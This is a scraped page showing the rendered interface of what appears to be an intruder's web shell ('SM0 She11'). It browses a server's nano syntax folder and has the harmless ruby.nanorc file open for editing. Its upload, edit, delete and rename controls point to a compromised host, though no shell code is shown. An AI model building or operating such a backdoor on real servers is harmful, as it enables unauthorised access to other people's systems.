SM0 She11
Path:
/
/
usr
/
share
/
nano
Full Path (server): /usr/share/nano
Create Fil3
Upl04d Fil3
📄 asm.nanorc
[E]
[D]
[R]
📄 awk.nanorc
[E]
[D]
[R]
📄 c.nanorc
[E]
[D]
[R]
📄 cmake.nanorc
[E]
[D]
[R]
📄 css.nanorc
[E]
[D]
[R]
📄 debian.nanorc
[E]
[D]
[R]
📄 fortran.nanorc
[E]
[D]
[R]
📄 gentoo.nanorc
[E]
[D]
[R]
📄 groff.nanorc
[E]
[D]
[R]
📄 html.nanorc
[E]
[D]
[R]
📄 java.nanorc
[E]
[D]
[R]
📄 lua.nanorc
[E]
[D]
[R]
📄 makefile.nanorc
[E]
[D]
[R]
📁 man-html
Open
[D]
[R]
📄 man.nanorc
[E]
[D]
[R]
📄 mgp.nanorc
[E]
[D]
[R]
📄 mutt.nanorc
[E]
[D]
[R]
📄 nanorc.nanorc
[E]
[D]
[R]
📄 objc.nanorc
[E]
[D]
[R]
📄 ocaml.nanorc
[E]
[D]
[R]
📄 patch.nanorc
[E]
[D]
[R]
📄 perl.nanorc
[E]
[D]
[R]
📄 php.nanorc
[E]
[D]
[R]
📄 pov.nanorc
[E]
[D]
[R]
📄 python.nanorc
[E]
[D]
[R]
📄 ruby.nanorc
[E]
[D]
[R]
📄 sh.nanorc
[E]
[D]
[R]
📄 spec.nanorc
[E]
[D]
[R]
📄 tcl.nanorc
[E]
[D]
[R]
📄 tex.nanorc
[E]
[D]
[R]
📄 xml.nanorc
[E]
[D]
[R]
Editing: ruby.nanorc
## Here is an example for Ruby. ## syntax "ruby" "\.rb$" header "^#!.*/ruby[-0-9._]*" ## Asciibetical list of reserved words color yellow "\<(BEGIN|END|alias|and|begin|break|case|class|def|defined\?|do|else|elsif|end|ensure|false|for|if|in|module|next|nil|not|or|redo|rescue|retry|return|self|super|then|true|undef|unless|until|when|while|yield)\>" ## Constants color brightblue "(\$|@|@@)?\<[A-Z]+[0-9A-Z_a-z]*" ## Ruby "symbols" icolor magenta "([ ]|^):[0-9A-Z_]+\>" ## Some unique things we want to stand out color brightyellow "\<(__FILE__|__LINE__)\>" ## Regular expressions color brightmagenta "/([^/]|(\\/))*/[iomx]*" "%r\{([^}]|(\\}))*\}[iomx]*" ## Shell command expansion is in `backticks` or like %x{this}. These are ## "double-quotish" (to use a perlism). color brightblue "`[^`]*`" "%x\{[^}]*\}" ## Strings, double-quoted color green ""([^"]|(\\"))*"" "%[QW]?\{[^}]*\}" "%[QW]?\([^)]*\)" "%[QW]?<[^>]*>" "%[QW]?\[[^]]*\]" "%[QW]?\$[^$]*\$" "%[QW]?\^[^^]*\^" "%[QW]?![^!]*!" ## Expression substitution. These go inside double-quoted strings, ## "like #{this}". color brightgreen "#\{[^}]*\}" ## Strings, single-quoted color green "'([^']|(\\'))*'" "%[qw]\{[^}]*\}" "%[qw]\([^)]*\)" "%[qw]<[^>]*>" "%[qw]\[[^]]*\]" "%[qw]\$[^$]*\$" "%[qw]\^[^^]*\^" "%[qw]![^!]*!" ## Comments color cyan "#[^{].*$" "#$" color brightcyan "##[^{].*$" "##$" ## "Here" docs color green start="<<-?'?EOT'?" end="^EOT" ## Some common markers color brightcyan "(XXX|TODO|FIXME|\?\?\?)"
Save